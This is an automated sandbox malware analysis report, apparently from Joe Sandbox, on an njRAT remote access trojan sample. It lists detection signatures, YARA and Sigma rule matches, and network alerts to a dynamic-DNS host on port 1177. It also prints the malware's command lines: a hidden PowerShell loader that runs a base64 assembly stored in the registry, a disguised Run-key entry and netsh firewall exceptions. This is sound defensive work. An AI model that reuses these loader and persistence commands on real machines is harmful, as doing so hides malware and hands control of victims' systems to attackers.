Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
._cache_1.exe

Overview

General Information

Sample name:._cache_1.exe
Analysis ID:1465120
MD5:62c01f1b2ac0a7bab6c3b50fd51e6a36
SHA1:cfc301a04b9a4ffeb0dc4578c1998a4eb4754f7b
SHA256:c46a631f0bc82d8c2d46e9d8634cc50242987fa7749cac097439298d1d0c1d6e
Infos:

Detection

Njrat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Njrat
.NET source code contains potential unpacker
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious values (likely registry only malware)
Disables zone checking for all users
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation STDIN+ Launcher
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious command line found
Suspicious powershell command line found
Uses dynamic DNS services
Uses netsh to modify the Windows network and firewall settings
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks for available system drives (often done to infect USB drives)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Powershell In Registry Run Keys
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w7x64
  • ._cache_1.exe (PID: 3172 cmdline: "C:\Users\user\Desktop\._cache_1.exe" MD5: 62C01F1B2AC0A7BAB6C3B50FD51E6A36)
    • Tr.exe (PID: 3196 cmdline: "C:\Users\user\AppData\Local\Temp\Tr.exe" MD5: 4D3B21451ED0EE3EE65888D4C8944693)
  • cmd.exe (PID: 3248 cmdline: "C:\Windows\System32\cmd.exe" /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null) MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • powershell.exe (PID: 3276 cmdline: powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null) MD5: A575A7610E5F003CC36DF39E07C4BA7D)
      • netsh.exe (PID: 3396 cmdline: netsh firewall add allowedprogram "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "powershell.exe" ENABLE MD5: 637982A421D0133DCEAA0D1490D1DC9C)
  • cmd.exe (PID: 3452 cmdline: "C:\Windows\System32\cmd.exe" /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null) MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • powershell.exe (PID: 3480 cmdline: powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null) MD5: A575A7610E5F003CC36DF39E07C4BA7D)
  • x.exe (PID: 3612 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 62C01F1B2AC0A7BAB6C3B50FD51E6A36)
    • Tr.exe (PID: 3640 cmdline: "C:\Users\user\AppData\Local\Temp\Tr.exe" MD5: 4D3B21451ED0EE3EE65888D4C8944693)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
NjRATRedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives."It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.
  • AQUATIC PANDA
  • Earth Lusca
  • Operation C-Major
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat
No configs have been found
SourceRuleDescriptionAuthorStrings
00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_NjratYara detected NjratJoe Security
    00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Njrat_30f3c220unknownunknown
    • 0xa9a59:$a1: get_Registry
    • 0x133e6c:$a2: SEE_MASK_NOZONECHECKS
    • 0x134b5c:$a2: SEE_MASK_NOZONECHECKS
    • 0x1358a4:$a2: SEE_MASK_NOZONECHECKS
    • 0x1371fc:$a2: SEE_MASK_NOZONECHECKS
    • 0x1342b6:$a3: Download ERROR
    • 0x134fa6:$a3: Download ERROR
    • 0x135cee:$a3: Download ERROR
    • 0x137646:$a3: Download ERROR
    • 0x13458a:$a5: netsh firewall delete allowedprogram "
    • 0x13527a:$a5: netsh firewall delete allowedprogram "
    • 0x135fc2:$a5: netsh firewall delete allowedprogram "
    • 0x13791a:$a5: netsh firewall delete allowedprogram "
    00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmpRAT_njRatDetects njRATKevin Breen <kevin@techanarchy.net>
    • 0x133ba2:$s1: 7C 00 27 00 7C 00 27 00 7C
    • 0x134892:$s1: 7C 00 27 00 7C 00 27 00 7C
    • 0x1355da:$s1: 7C 00 27 00 7C 00 27 00 7C
    • 0x136f32:$s1: 7C 00 27 00 7C 00 27 00 7C
    • 0x138514:$s1: 7C 00 27 00 7C 00 27 00 7C
    • 0x133ea0:$s2: netsh firewall add allowedprogram
    • 0x134b90:$s2: netsh firewall add allowedprogram
    • 0x1358d8:$s2: netsh firewall add allowedprogram
    • 0x137230:$s2: netsh firewall add allowedprogram
    • 0x133bfa:$s3: Software\Microsoft\Windows\CurrentVersion\Run
    • 0x1348ea:$s3: Software\Microsoft\Windows\CurrentVersion\Run
    • 0x135632:$s3: Software\Microsoft\Windows\CurrentVersion\Run
    • 0x136f8a:$s3: Software\Microsoft\Windows\CurrentVersion\Run
    • 0x1392a4:$s3: Software\Microsoft\Windows\CurrentVersion\Run
    • 0x133daa:$s4: yyyy-MM-dd
    • 0x134a9a:$s4: yyyy-MM-dd
    • 0x1357e2:$s4: yyyy-MM-dd
    • 0x13713a:$s4: yyyy-MM-dd
    • 0x134606:$v2: cmd.exe /c ping 127.0.0.1 & del
    • 0x1352f6:$v2: cmd.exe /c ping 127.0.0.1 & del
    • 0x13603e:$v2: cmd.exe /c ping 127.0.0.1 & del
    00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmpnjrat1Identify njRatBrian Wallace @botnet_hunter
    • 0x133ea0:$a1: netsh firewall add allowedprogram
    • 0x134b90:$a1: netsh firewall add allowedprogram
    • 0x1358d8:$a1: netsh firewall add allowedprogram
    • 0x137230:$a1: netsh firewall add allowedprogram
    • 0x133e6c:$a2: SEE_MASK_NOZONECHECKS
    • 0x134b5c:$a2: SEE_MASK_NOZONECHECKS
    • 0x1358a4:$a2: SEE_MASK_NOZONECHECKS
    • 0x1371fc:$a2: SEE_MASK_NOZONECHECKS
    • 0x1346e4:$b1: [TAP]
    • 0x1353d4:$b1: [TAP]
    • 0x13611c:$b1: [TAP]
    • 0x137a74:$b1: [TAP]
    • 0x134606:$c2: cmd.exe /c ping 127.0.0.1 & del
    • 0x1352f6:$c2: cmd.exe /c ping 127.0.0.1 & del
    • 0x13603e:$c2: cmd.exe /c ping 127.0.0.1 & del
    • 0x137996:$c2: cmd.exe /c ping 127.0.0.1 & del
    • 0x134606:$c3: cmd.exe /c ping
    • 0x1352f6:$c3: cmd.exe /c ping
    • 0x13603e:$c3: cmd.exe /c ping
    • 0x137996:$c3: cmd.exe /c ping
    00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_NjratYara detected NjratJoe Security
      Click to see the 7 entries
      SourceRuleDescriptionAuthorStrings
      9.2.powershell.exe.2db8ea0.1.raw.unpackJoeSecurity_NjratYara detected NjratJoe Security
        9.2.powershell.exe.2db8ea0.1.raw.unpackWindows_Trojan_Njrat_30f3c220unknownunknown
        • 0xabb9:$a1: get_Registry
        • 0x94fcc:$a2: SEE_MASK_NOZONECHECKS
        • 0x95cbc:$a2: SEE_MASK_NOZONECHECKS
        • 0x96a04:$a2: SEE_MASK_NOZONECHECKS
        • 0x9835c:$a2: SEE_MASK_NOZONECHECKS
        • 0x95416:$a3: Download ERROR
        • 0x96106:$a3: Download ERROR
        • 0x96e4e:$a3: Download ERROR
        • 0x987a6:$a3: Download ERROR
        • 0x956ea:$a5: netsh firewall delete allowedprogram "
        • 0x963da:$a5: netsh firewall delete allowedprogram "
        • 0x97122:$a5: netsh firewall delete allowedprogram "
        • 0x98a7a:$a5: netsh firewall delete allowedprogram "
        9.2.powershell.exe.2db8ea0.1.raw.unpackRAT_njRatDetects njRATKevin Breen <kevin@techanarchy.net>
        • 0x94d02:$s1: 7C 00 27 00 7C 00 27 00 7C
        • 0x959f2:$s1: 7C 00 27 00 7C 00 27 00 7C
        • 0x9673a:$s1: 7C 00 27 00 7C 00 27 00 7C
        • 0x98092:$s1: 7C 00 27 00 7C 00 27 00 7C
        • 0x99674:$s1: 7C 00 27 00 7C 00 27 00 7C
        • 0x95000:$s2: netsh firewall add allowedprogram
        • 0x95cf0:$s2: netsh firewall add allowedprogram
        • 0x96a38:$s2: netsh firewall add allowedprogram
        • 0x98390:$s2: netsh firewall add allowedprogram
        • 0x94d5a:$s3: Software\Microsoft\Windows\CurrentVersion\Run
        • 0x95a4a:$s3: Software\Microsoft\Windows\CurrentVersion\Run
        • 0x96792:$s3: Software\Microsoft\Windows\CurrentVersion\Run
        • 0x980ea:$s3: Software\Microsoft\Windows\CurrentVersion\Run
        • 0x9a404:$s3: Software\Microsoft\Windows\CurrentVersion\Run
        • 0x94f0a:$s4: yyyy-MM-dd
        • 0x95bfa:$s4: yyyy-MM-dd
        • 0x96942:$s4: yyyy-MM-dd
        • 0x9829a:$s4: yyyy-MM-dd
        • 0x95766:$v2: cmd.exe /c ping 127.0.0.1 & del
        • 0x96456:$v2: cmd.exe /c ping 127.0.0.1 & del
        • 0x9719e:$v2: cmd.exe /c ping 127.0.0.1 & del
        9.2.powershell.exe.2db8ea0.1.raw.unpacknjrat1Identify njRatBrian Wallace @botnet_hunter
        • 0x95000:$a1: netsh firewall add allowedprogram
        • 0x95cf0:$a1: netsh firewall add allowedprogram
        • 0x96a38:$a1: netsh firewall add allowedprogram
        • 0x98390:$a1: netsh firewall add allowedprogram
        • 0x94fcc:$a2: SEE_MASK_NOZONECHECKS
        • 0x95cbc:$a2: SEE_MASK_NOZONECHECKS
        • 0x96a04:$a2: SEE_MASK_NOZONECHECKS
        • 0x9835c:$a2: SEE_MASK_NOZONECHECKS
        • 0x95844:$b1: [TAP]
        • 0x96534:$b1: [TAP]
        • 0x9727c:$b1: [TAP]
        • 0x98bd4:$b1: [TAP]
        • 0x95766:$c2: cmd.exe /c ping 127.0.0.1 & del
        • 0x96456:$c2: cmd.exe /c ping 127.0.0.1 & del
        • 0x9719e:$c2: cmd.exe /c ping 127.0.0.1 & del
        • 0x98af6:$c2: cmd.exe /c ping 127.0.0.1 & del
        • 0x95766:$c3: cmd.exe /c ping
        • 0x96456:$c3: cmd.exe /c ping
        • 0x9719e:$c3: cmd.exe /c ping
        • 0x98af6:$c3: cmd.exe /c ping
        9.2.powershell.exe.2db8ea0.1.raw.unpackMALWARE_Win_NjRATDetects NjRAT / BladabindiditekSHen
        • 0x956ea:$s1: netsh firewall delete allowedprogram
        • 0x963da:$s1: netsh firewall delete allowedprogram
        • 0x97122:$s1: netsh firewall delete allowedprogram
        • 0x98a7a:$s1: netsh firewall delete allowedprogram
        • 0x95000:$s2: netsh firewall add allowedprogram
        • 0x95cf0:$s2: netsh firewall add allowedprogram
        • 0x96a38:$s2: netsh firewall add allowedprogram
        • 0x98390:$s2: netsh firewall add allowedprogram
        • 0x95766:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67
        • 0x96456:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67
        • 0x9719e:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67
        • 0x98af6:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67
        • 0x953e4:$s4: Execute ERROR
        • 0x960d4:$s4: Execute ERROR
        • 0x96e1c:$s4: Execute ERROR
        • 0x98774:$s4: Execute ERROR
        • 0x95416:$s5: Download ERROR
        • 0x96106:$s5: Download ERROR
        • 0x96e4e:$s5: Download ERROR
        • 0x987a6:$s5: Download ERROR

        System Summary

        barindex
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null), CommandLine: "C:\Windows\System32\cmd.exe" /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null), CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null), ProcessId: 3248, ProcessName: cmd.exe
        Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null), CommandLine: "C:\Windows\System32\cmd.exe" /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null), CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null), ProcessId: 3248, ProcessName: cmd.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null), CommandLine: "C:\Windows\System32\cmd.exe" /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null), CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null), ProcessId: 3248, ProcessName: cmd.exe
        Source: Process startedAuthor: frack113: Data: Command: powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null), CommandLine: powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3248, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null), ProcessId: 3276, ProcessName: powershell.exe
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\System32\cmd.exe /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null), EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\Tr.exe, ProcessId: 3196, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\AdobeMX
        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\._cache_1.exe, ProcessId: 3172, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.lnk
        Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: C:\Windows\System32\cmd.exe /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null), EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\Tr.exe, ProcessId: 3196, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\AdobeMX
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null), CommandLine: powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3248, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null), ProcessId: 3276, ProcessName: powershell.exe
        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3276, TargetFilename: C:\Users\user\AppData\Local\Temp\hd4k0f3o.akt.ps1
        Timestamp:07/01/24-10:22:43.879655
        SID:2017419
        Source Port:49166
        Destination Port:1177
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/01/24-10:25:00.126873
        SID:2017419
        Source Port:49176
        Destination Port:1177
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/01/24-10:24:33.177434
        SID:2017419
        Source Port:49174
        Destination Port:1177
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/01/24-10:25:27.489939
        SID:2017419
        Source Port:49178
        Destination Port:1177
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/01/24-10:23:24.901144
        SID:2017419
        Source Port:49169
        Destination Port:1177
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/01/24-10:24:19.571508
        SID:2017419
        Source Port:49173
        Destination Port:1177
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/01/24-10:22:30.431063
        SID:2017419
        Source Port:49165
        Destination Port:1177
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/01/24-10:23:52.503013
        SID:2017419
        Source Port:49171
        Destination Port:1177
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/01/24-10:22:03.684189
        SID:2017419
        Source Port:49163
        Destination Port:1177
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/01/24-10:23:38.664413
        SID:2017419
        Source Port:49170
        Destination Port:1177
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/01/24-10:22:57.541620
        SID:2017419
        Source Port:49167
        Destination Port:1177
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/01/24-10:24:46.813104
        SID:2017419
        Source Port:49175
        Destination Port:1177
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/01/24-10:25:13.886977
        SID:2017419
        Source Port:49177
        Destination Port:1177
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/01/24-10:24:06.132111
        SID:2017419
        Source Port:49172
        Destination Port:1177
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/01/24-10:21:49.438511
        SID:2017419
        Source Port:49162
        Destination Port:1177
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/01/24-10:23:11.211027
        SID:2017419
        Source Port:49168
        Destination Port:1177
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/01/24-10:22:16.980393
        SID:2017419
        Source Port:49164
        Destination Port:1177
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: ._cache_1.exeAvira: detected
        Source: C:\Users\user\AppData\Local\Temp\x.exeAvira: detection malicious, Label: HEUR/AGEN.1321308
        Source: water-boom.duckdns.orgVirustotal: Detection: 9%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeReversingLabs: Detection: 80%
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeVirustotal: Detection: 66%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\x.exeReversingLabs: Detection: 80%
        Source: C:\Users\user\AppData\Local\Temp\x.exeVirustotal: Detection: 68%Perma Link
        Source: ._cache_1.exeReversingLabs: Detection: 80%
        Source: ._cache_1.exeVirustotal: Detection: 68%Perma Link
        Source: Yara matchFile source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3276, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3480, type: MEMORYSTR
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 87.7% probability
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\x.exeJoe Sandbox ML: detected
        Source: ._cache_1.exeJoe Sandbox ML: detected
        Source: ._cache_1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
        Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: z:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: x:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: v:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: t:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: r:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: p:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: n:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: l:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: j:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: h:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: f:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: b:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: y:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: w:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: u:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: s:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: q:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: o:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: m:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: k:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: i:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: g:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: e:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: c:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: a:Jump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
